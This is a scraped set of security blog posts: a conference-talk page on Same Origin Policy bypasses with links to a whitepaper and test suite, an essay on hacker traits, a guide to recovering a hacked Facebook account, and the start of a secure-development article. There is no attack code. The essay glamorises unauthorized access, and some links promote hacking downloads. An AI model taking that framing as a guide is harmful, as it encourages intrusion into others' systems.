<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUz-qj4HTDvkpJCqlU7NuSPcAvNCU8TeeiF1HcwGlN11DmlSLwQpuKTd9eVqtGQ0aHfCzRTrC4aJPgMpMr8qasj1Mz4BDHJJu4xkvJR4YQoNda6kuY66D6CHdCWHqGX_YxPS-64Q0p4OQ/s1600/1058332_996319127089148_582866012_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUz-qj4HTDvkpJCqlU7NuSPcAvNCU8TeeiF1HcwGlN11DmlSLwQpuKTd9eVqtGQ0aHfCzRTrC4aJPgMpMr8qasj1Mz4BDHJJu4xkvJR4YQoNda6kuY66D6CHdCWHqGX_YxPS-64Q0p4OQ/s400/1058332_996319127089148_582866012_n.jpg" width="386" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
<b>To download the Whitepaper, please click <a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit-wp.pdf" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
<h4>
Slides</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzUK-Tk-0rJCVjhfClAcDoVeGHCZtfro-H0onk5g3OP_yKbIlTDrl3-mLHXdhq1ZXJsLR8e1TG8KecurJR_pNyZD3okbqvFmgZkjOal77TPAXVlOnMFjx53Tcs9y8KsjRo6cK_BVFOdms/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzUK-Tk-0rJCVjhfClAcDoVeGHCZtfro-H0onk5g3OP_yKbIlTDrl3-mLHXdhq1ZXJsLR8e1TG8KecurJR_pNyZD3okbqvFmgZkjOal77TPAXVlOnMFjx53Tcs9y8KsjRo6cK_BVFOdms/s640/test.png" width="577" /></a></div>
<div>
<br /></div>
</div>
<b>To download the Slides, please click <a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit.pdf" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
<h4>
SOP Bypass Mini Test Suite v 1.0 Beta</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlt-95SpfhwR6kTIlYCdsk-3GAeL7YkkC66eMDASHp2ATmSDG_mgyPoUfl3dSuuqI8vvHYlOaKAoCLqAX8BsKq9oHvDKJSC90qYp53SF0peXK9S3EVs3SVkOvVd0Ga8DKcQUKfawonygM/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlt-95SpfhwR6kTIlYCdsk-3GAeL7YkkC66eMDASHp2ATmSDG_mgyPoUfl3dSuuqI8vvHYlOaKAoCLqAX8BsKq9oHvDKJSC90qYp53SF0peXK9S3EVs3SVkOvVd0Ga8DKcQUKfawonygM/s640/test.png" width="577" /></a></div>
<br />
As promised in my talk, i will make the test suite available on my blog, This test suite contains over 40 different test cases that have proven to work with different mobile browsers in my research or testing Same Origin Policy bypass issues with browsers. Due credits were given to the researchers whose Proof of concepts have been incorporated in this test suite. Please note that, this is just the beta version, the next version would have more test cases and we will try to automate the execution and results of all the test cases.<br />
<br />
<b>To download the SOP Bypass Mini Test Suite, please click <a href="https://github.com/rafaybaloch/SOP-Bypass-Mini-Test-Suite" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
Shall you have any questions, feel free to ask. </div>
<script>
location.href="https://www.rafaybaloch.com/2017/06/bypassing-browser-security-policies-for.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com6tag:blogger.com,1999:blog-3121270199089759062.post-17501201089364637922016-02-09T13:03:00.000-08:002020-05-27T14:30:35.550-07:007 Qualities of Highly Effective Hackers<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMEtucXqVr6izUDX6ffS7WulxSY3YydnXajzWN8-keVY5JQfLim7lJeRsWgN3c1XuunT49Fn2oij7sEncgtHT7HlVVS4z3DFdQ9tCOA1z0Uh5ZGdeAEnCBzMUD44Yzu0boFLrL7KQ9KIA/s1600/frederic-pretty-hacker-hoax.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMEtucXqVr6izUDX6ffS7WulxSY3YydnXajzWN8-keVY5JQfLim7lJeRsWgN3c1XuunT49Fn2oij7sEncgtHT7HlVVS4z3DFdQ9tCOA1z0Uh5ZGdeAEnCBzMUD44Yzu0boFLrL7KQ9KIA/s320/frederic-pretty-hacker-hoax.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">When asked to write on this topic, I admit that it mad</span><span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">e me fringe just a bit. Because I don't consider myself to be a highly effective hacker. I find myself as a noob everywhere that I'm trying to learn new things, or I am frustrated with the most ridiculous "</span><b style="color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">hacker</b><span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">" material on the web, written by school-taught programmers that follow step by step instructions out of a manual that everyone has already read. Then I thought to myself.. "That's it!" That is Number One!</span><br />
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;"></span><br />
<a name='more'></a></div>
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality One- Always A N00b</span></h4>
<div>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;"><br /></span></div>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and comments you always see the trolls calling the weakest link a noob and picking on them.. and then THEY are revealed to be newbies also? Well guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I already am adept at the subject or skill level, at hand, I find that not only have months gone by without me learning anything new.</span><br />
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">I have also gotten rusty at things I was beginning to learn. So as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob. Always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is now teaching others how to do it and busy with something else he doesn't yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments, picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone because they have settled for what they know and are satisfied with it in an ever evolving and changing world of technology.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Two- Curiosity </span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems are just following step by step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity. </span><br />
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">These personal drives will bring a person farther in skill than the need for a promotion or recognition will. "I wonder what would happen if I tried to.." "What do you suppose they keep in here.." "OMG! What if I trick it into running this as a..." These are the basic thought patterns of an effective hacker. Not just when he has a job to do. I mean always. For example when you were a kid (or even now) played a video game and found a weird glitch (not necessarily a 'cheat') that you thought was funny. "Oh wow. If I walk in this corner backward he kinda gets stuck there.. UPSIDE DOWN! LOL", "What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I'm not even supposed to be yet!". OK This is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Three- Enjoys being places he doesn't belong</span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Hey sorry all you white-hats out there, but it's true. I won't condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don't know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Four-An unbalanced lifestyle</span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">I often find myself engorged in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day.. and then it's time to go back in to work. That's them. LOL Now I am not saying that being an effective hacker means they do not have a life (though some may not). Alot of very successful people get obsessed with what they are working on and do nothing but that.. For a while. Then they go through a phase where they are obsessed with something different.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Five- Likes to break things</span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Come on guys! We're hackers! We love to smash things apart and see what happens. Because face it, it's much easier to break something than to make it and it rewards a valuable opportunity to put it back together in a different way.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Six- Well Organized</span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">In the beginning, it's ok to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OS's. But eventually that's going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You'll see varions windows and terminals open, seperate directories for everything, that are well categorized, a task manager changing process priorities as he's bouncing from one project to the other, across his screen.
</span><br />
<h4 style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">Quality Seven- Everything is Insecure until... Never.</span></h4>
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;">The most efficient hackers know that all software, hardware, and access controls are man made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of the creators. People. Nothing can ever be completely trusted, just as no person can be completely trusted.
</span><br />
<span style="background-color: white; color: #333333; font-family: "lucida grande" , "tahoma" , "verdana" , "arial" , sans-serif; font-size: 13px; line-height: 17px; white-space: pre-wrap;"><br /></span></div>
<h4>
About the Author</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyNCrN6xmwchH6yLOWle0ROMnS3bh-ujCwsZSEN7ZqtsVgnsR2Css0FJYyuoKkNu-nHlZW9FFGzlaRbLvBb0U0sJ2faEzf9ewbmju93Mn6w6c-TQ6iOKB30HElJgxmOTqvPrJCN4FX3k/s1600/954433_240088456157351_1866033370_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyNCrN6xmwchH6yLOWle0ROMnS3bh-ujCwsZSEN7ZqtsVgnsR2Css0FJYyuoKkNu-nHlZW9FFGzlaRbLvBb0U0sJ2faEzf9ewbmju93Mn6w6c-TQ6iOKB30HElJgxmOTqvPrJCN4FX3k/s320/954433_240088456157351_1866033370_n.jpg" width="226" /></a></div>
I'm Gary. Though I have many names in many places, this is my true one. I am honored to have been invited by the <b>RHA</b> InfoSec to create content. I can't really go all the way into my experience, suffice to say my greatest teachers have been hours upon hours of trial, effort, information and second opinions.<br />
<br />
My skill-set is wide and varied and I am more a "Jack of all trades", rather than a specialist in any one category. I stay pretty busy with various projects (not all is computer related), but I will do my best to lend my time, effort, and knowledge. If I am busy or unable to answer any of your inquiries or handle your requests, for whatever reason, then I am sure Rafay, or Preston or any of the others can when they are able.
Last but not least. I (PERSONALLY) do not want your likes, recognition, attention, traffic, or friends. Please save all of that for Rafay and the <a href="http://facebook.com/rafayhackingarticles" rel="nofollow" target="_blank">RHA Page</a>. These guys have put this together, for you and deserve all recognition for it. Thank you.
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/7-qualities-of-highly-effective-hackers.html.html";
</script>Farhan Azamhttp://www.blogger.com/profile/07946638849267227635noreply@blogger.com10tag:blogger.com,1999:blog-3121270199089759062.post-47789757175613446952016-01-17T08:51:00.002-08:002020-05-27T14:31:02.869-07:00Facebook Account Hacked! What To Do Now?<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4sl1fhJ9DUYy65KeE3I1nA8awQStQXH4p8e-DkLivVOQ4GUJxPoHLOZuWUVS1V9kx6aZ-59KNZP501Vz7aa_kn7udvMFnbqGUFUt5kJidIgunLM3G_JW48gbxvNlkYB1BxCEA3fsRT8/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4sl1fhJ9DUYy65KeE3I1nA8awQStQXH4p8e-DkLivVOQ4GUJxPoHLOZuWUVS1V9kx6aZ-59KNZP501Vz7aa_kn7udvMFnbqGUFUt5kJidIgunLM3G_JW48gbxvNlkYB1BxCEA3fsRT8/s1600/images.jpg" /></a></div>
<br />
Every single day i get emails in my inbox and on my <a href="https://www.facebook.com/rafaybalochofficialpage/?fref=ts" rel="nofollow" target="_blank">facebook page</a> from users querying about how to recover<a href="http://www.rafayhackingarticles.net/2010/01/4-ways-on-how-to-hack-facebook-password.html" target="_blank"> hacked facebook account </a>and a common problem i see in all of them is that they are proactive. Everyone searches for Facebook account recovery softwares, <a href="http://www.rafayhackingarticles.net/2010/01/4-ways-on-how-to-hack-facebook-password.html" target="_blank">Facebook hacking softwares </a>and recovery mechanisms after their facebook or any other email account has been hacked. In this article, Gary suggests methods to identify if your computer or email account has been hacked and methods suggesting what you can do after your facebook account has been hacked.<br />
<br />
In today’s digital world, it is unfortunately not uncommon for an account or machine to become compromised by an attacker for nefarious purposes. During your searches for a step-by-step solution, your frustration may hit the breaking point, as you scroll through page after page, listing preventative measures that it may already be too late for. No problem. In today’s article I will outline simple strategies that should get you back in control of your online accounts and devices after a breach is suspected or confirmed. These instructions will be laid out in a manner that should be quite easy for an average user to comprehend and execute. But first, let’s take a minute to understand exactly how this probably happened in the first place.<br />
<br />
<a name='more'></a><b>NOTE: If you are potentially dealing with this situation right now, please skip ahead to the “ What do I do?” section of this article, first. Then be sure to read the rest.</b><br />
<h4 style="text-align: left;">
Did I Get Hacked?</h4>
You’re browsing around online and suddenly your friends on social media are asking you what these links you keep sending them are, or perhaps your password to an online account has been changed, emails are being sent from your email account, or there is just something strange in your activity log. Do any of these mean that your account has been compromised?<br />
<br />
First of all, always assume your account and system have been compromised and take the appropriate measures to secure them, when in doubt. Do not let an attacker maintain a foothold and continue masquerading as you and/or stealing your sensitive data and files, while you come up with excuses to justify unfamiliar activity. Also, while many online services and accounts have a ‘<b>connected devices</b>’, ‘<b>location information</b>’, or ‘<b>login activity</b>’ viewer in their settings, this should never be advised as a sure-fire way to rule out being hacked. There are many ways that these features can be rendered useless - malware can be installed on the user’s machine which sets up an HTTP or SOCKS proxy on the machine of the user, session cookies can be stolen, and even the online account settings themselves can be manipulated or even flawed to cover malicious activity. Secure your accounts and system, anyway, just to be safe. It may be time consuming, but it is far better than waiting around for something bad to happen.<br />
<br />
<h4 style="text-align: left;">
How Does This Happen (Methods To Hack Facebook Account)?</h4>
There are many methods which attackers deploy to breach online accounts of their victims. This is not meant to be an instruction manual or even a comprehensive list of every way an attacker can possibly compromise your system, accounts, and/or online services. This is just an overview of the most common real-world techniques that are actually being deployed. If you’ve been hacked, chances are good that it was done by a combination of the techniques listed below. <br />
<br />
There are <b>Man-In-The-Middle Attacks </b>which capture data packets from the victim machine and store them, before sending them along to the proper destination. There’s <b>Phishing</b>, where an attacker convinces you to sign in to your account via a fake login page, then steals your credentials. Sometimes websites themselves are hacked via sql injection methods that dump the entire database of usernames and password hashes… these same username/password combinations are then attempted on many various sites, since a lot of users use the same login credentials across many websites and services. Then there is potentially the most dangerous… malware can be installed on the victim machine which can do anything from logging keystrokes, to remotely browsing the filesystem, to opening a remote shell, or even spying on the users via their webcams and microphones. <br />
<br />
The malicious hacker’s toolbox of techniques is always evolving and changing to meet changes in security practice and while there are other ways accounts can be compromised, most real-world hacks are a combination of some of the techniques listed above. <br />
<br />
<h4 style="text-align: left;">
“What Do I Do?”</h4>
I would like to divide this into three sections, as each are important. Secure Your Accounts and Services, Secure Your Machines and Devices, and Damage Control. You don’t know for sure how much of a foot-hold an attacker has or how long they have had it, before you realized or became suspicious. So assume everything has been compromised and secure each of them, as they may be used by an attacker to later re-compromise what you have secured.<br />
<div>
<h4 style="text-align: left;">
Secure Your Facebook Accounts and Online Services</h4>
You must change the passwords to all your online accounts and services that you use. Even the ones that you don’t recall using sensitive data on. This practice should obviously be prioritized, beginning with the account that you notice suspicious activity on.<br />
<br />
Then quickly change your associated email accounts, as these can usually be used to reset the passwords to your other accounts. Be sure to ‘<b>logout active sessions</b>’ or connected devices, if your service has this feature. If so, you will probably be asked or prompted with it, during the password reset process.<br />
<br />
Do not use the same passwords across different sites or services. Go to the security settings of each site or service and activate every notification you possibly can for login attempts and activity Enable two-factor authentication. Make it a pain in the ass to login if you must. Remember that ease of use and convenience are simply open doors for many others. <br />
<br />
Then, after you have secured your devices, go through and do a final sweep of password changes. This final step is due to the fact that, if malware is installed on your device, an attacker could potentially be watching you change all your passwords the first time.<br />
<br />
Also, follow your website, social media, or other online service’s specific guidelines for reporting unusual behavior and securing your accounts. They most likely have a staff that deals with these situations on a daily basis, are usually very polite and helpful and there should never be any negative consequences if you are in error in your reporting of a hacked account.<br />
<h4 style="text-align: left;">
Secure Your Devices</h4>
We must next purge your devices of any malicious processes. There are usually many free antivirus solutions that do a great job at eliminating these threats in a simple scan, but don’t be scammed by a fake. Do your research for the latest, well known and best free or paid (depending on your budget) anti-malware solution. Read third party reviews. <br />
<br />
Now, I know that anti-virus protection is not always a 100% solution, as there are many obfuscation and crypting methods that can be used to hide malware signatures from antivirus scans, but the big antivirus companies are very competitive and new definition updates roll out on a regular basis. At the time of writing this, the average private crypts are only FUD (fully undetectable) for approximately one month and the average public crypts which actually are FUD (most are never FUD, from the beginning) are only so for about one or two weeks. <br />
<br />
While an anti-virus scan will most likely eliminate the threats on your PC, it is still advised that you backup your important files and data, format your hard drive and reinstall your operating system. For devices other than PC, follow your manufacturer’s guidelines for resetting your device to default factory settings.<br />
<h4 style="text-align: left;">
Damage Control</h4>
An often overlooked aspect of securing your accounts and services, is what to do afterward. It is a bit important, because you may not know what messages have been sent to others or what was done in your name. <br />
<br />
Financial services should be your first concern. Check your account activity for any purchases you do not recognize. Be sure to call your bank or credit card companies and have new card numbers issued. <br />
<br />
As for social media, don’t be embarrassed or ashamed to post a public announcement, for everyone to see. Most everyone has seen social media accounts having been taken over by an attacker or bot and posting malicious links all over the internet, already. These things happen all of the time. This is nothing new and people will not think of you as being stupid or view you in a different light. They will instead judge you based on your quick and calm ability to assess and take control of the situation, most likely awarding you with support and respect. <br />
<br />
For formal or social media accounts, a statement like this should be sufficient:<br />
<br />
“<i>Hello Everyone. I have an important and unfortunate announcement to make. It appears that some of my accounts were compromised (hacked). I noticed suspicious activity on (date XX/XX/XX ) and while I am actively securing everything and the damage seems minimal, there’s no way for me to know the full extent or length of time of the breach. If you noticed any suspicious activity from my account or strange messages, please inform me immediately. Also if you have gotten any links from “me” recently, do not follow them. Instead ask me about them after I have finished securing all of my accounts, devices and services. I appreciate your support. Have a great day, everyone and apologies if there has been any inconvenience</i>.”<br />
<br />
<b>A shorter version: </b><br />
<br />
“One of my accounts was recently hacked. Things seem fine so far. I’m now securing it. Be sure to let me know of anything suspicious from my account. Thanks.”<br />
<br />
And last, but not least: prevention. This could’ve saved you a lot of effort and grief to begin with. Keep up to date with the latest security practices for all of your online services, all your accounts, and all of your devices, because often a foothold into one of these can allow access into others.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://d2yca1enuxtdrs.cloudfront.net/images/resize/product/1240/9ad478f4f3c78067c197aeda0c96b448.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://d2yca1enuxtdrs.cloudfront.net/images/resize/product/1240/9ad478f4f3c78067c197aeda0c96b448.jpg" width="363" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://sellfy.com/p/4fwQ/-HappyNewYear/" rel="nofollow" target="_blank"><span style="font-size: large;">Download And Learn How To Hack</span></a></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEjhJO0ByBsymNUDEXpbADS7PdOV3DFBNi8BPVJHVrRfZYIlv7sc0-NxDMxMPtLzmOi_UiIwgqeTWZYpUzIo6hyu4vtGVtIDuDFLL7pV0mxpgb4kFDOph1wbNUJHqkWpnAtOrapwMQp9M9kfjftUV5yEdAwDXnv8bDBOMuE=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://ethicalhacking.gohacking.com/images/buy-book-img.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: left;"></b></div>
<div class="separator" style="clear: both; color: #333333; font-family: Arial, Tahoma, Verdana; text-align: center;">
<b><span style="color: #a91b33; font-size: large; text-decoration: none;"><a href="http://filesmy.com/file/056md4" rel="nofollow" style="color: #a91b33; text-decoration: none;">Download Hacking Secrets Exposed For Free</a></span></b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
About the Author</h3>
</div>
<div>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlPEJQuxsDxax9BgcrI6Gmb9vTGNE3aFkBPHJiCEjhpkb4Y6t39cfTNXDk9GZQUb_JnFRKaCbKznUi2k_SGL5iSCDg1KN_o-QCGWPiyEbaugJYMOO2r4F-8KtmpC_kOEWEvFT5nUmJIqI/s1600/12571269_544229605743233_146934175_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlPEJQuxsDxax9BgcrI6Gmb9vTGNE3aFkBPHJiCEjhpkb4Y6t39cfTNXDk9GZQUb_JnFRKaCbKznUi2k_SGL5iSCDg1KN_o-QCGWPiyEbaugJYMOO2r4F-8KtmpC_kOEWEvFT5nUmJIqI/s1600/12571269_544229605743233_146934175_n.jpg" /></a>My name is <b>Gary Lewis</b>. While I am not as knowledgeable and skilled as many of your programming and security experts and teachers are, I do have real-world experience. There are a lot of technical skills that I'm not an expert at, but I was involved in a lot of things I will not list here and I do know how hacks are being done in the real world, rather than textbook knowledge. I retired from that scene some time ago and decided to pursue philosophy, art, and poetry. Currently, I am working on 3 series of dark themed art and poetry books entitled Paradoxium, Inevitum, and Relativium about Chaos, Order, and Time. I still stay up to date on data security and am happy to write an article for my good friend Rafay, when he wishes, but my days of hacking are over. So if you have any questions or inquiries, please refer to him and his team. They are very knowledgeable in their field of study.</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/facebook-account-hacked-what-to-do-now.html";
</script>
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2Fethicalhacking.gohacking.com%2Fimages%2Fbuy-book-img.png&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEjhJO0ByBsymNUDEXpbADS7PdOV3DFBNi8BPVJHVrRfZYIlv7sc0-NxDMxMPtLzmOi_UiIwgqeTWZYpUzIo6hyu4vtGVtIDuDFLL7pV0mxpgb4kFDOph1wbNUJHqkWpnAtOrapwMQp9M9kfjftUV5yEdAwDXnv8bDBOMuE=" -->Farhan Azamhttp://www.blogger.com/profile/07946638849267227635noreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-10892335506322092102015-12-18T11:51:00.002-08:002020-05-27T14:31:42.935-07:00Secure Application Development And Modern Defenses<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3cLwB6D5ri-dsd7rvLbTKSDAFIrDW4CI1tAs7GZlZMdsQMLntoGzK1c1CCpQyyXZHW9Y8L-hIDG3fCUFmSy9O9-1-tbDb16MPHJDddFsrsAOT8hXbN29UeFEbaScRFeKiNN-KbfX4fY/s1600/hacker+security-med_.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3cLwB6D5ri-dsd7rvLbTKSDAFIrDW4CI1tAs7GZlZMdsQMLntoGzK1c1CCpQyyXZHW9Y8L-hIDG3fCUFmSy9O9-1-tbDb16MPHJDddFsrsAOT8hXbN29UeFEbaScRFeKiNN-KbfX4fY/s400/hacker+security-med_.jpg" width="400" /></a></div>
<div rtenodeid="3" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Abstract</h4>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">When it comes to the internet, security has always been an after-thought. A great evidence to support the theory can be seen when we look at the history of the internet. The internet was created by US military back in 1969, branded as "Arpanet" at that time. In 1973, ARPANET created TCP IP protocol suite which later enabled the development of protocols such as "SMTP, POP3, FTP, TELNET " in 1980's and HTTP in 1991. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">All of these protocols could be easily eaves-dropped upon by an attacker as they do not encrypt the traffic. Their secure versions were released only later, such as FTPS, SMTPS, SSH, and HTTPS since at that time connecting people and building features was the priority. If security would have been present by design, we would not have encountered these problems today. </span><br />
<a name='more'></a>The same is the case of when we develop the products today, we consider security to be an after-thought rather than an in-built feature, as a reason of which, security breaches occur. In this article, we would talk about secure application development and why SDLC (System Development Lifecycle) is an ideal model for building secure products.<br />
<br />
The model leads "Security By Design" and "In-depth Defense" approach. The idea behind this model is that security should be an essential part of all phases of SDLC so that the bugs are addressed during the early stages of development. Fixing security issues at earlier stages of the development cycle directly reduces costs, time, effortand resources.</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Application Layer Security Attacks</h4>
</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
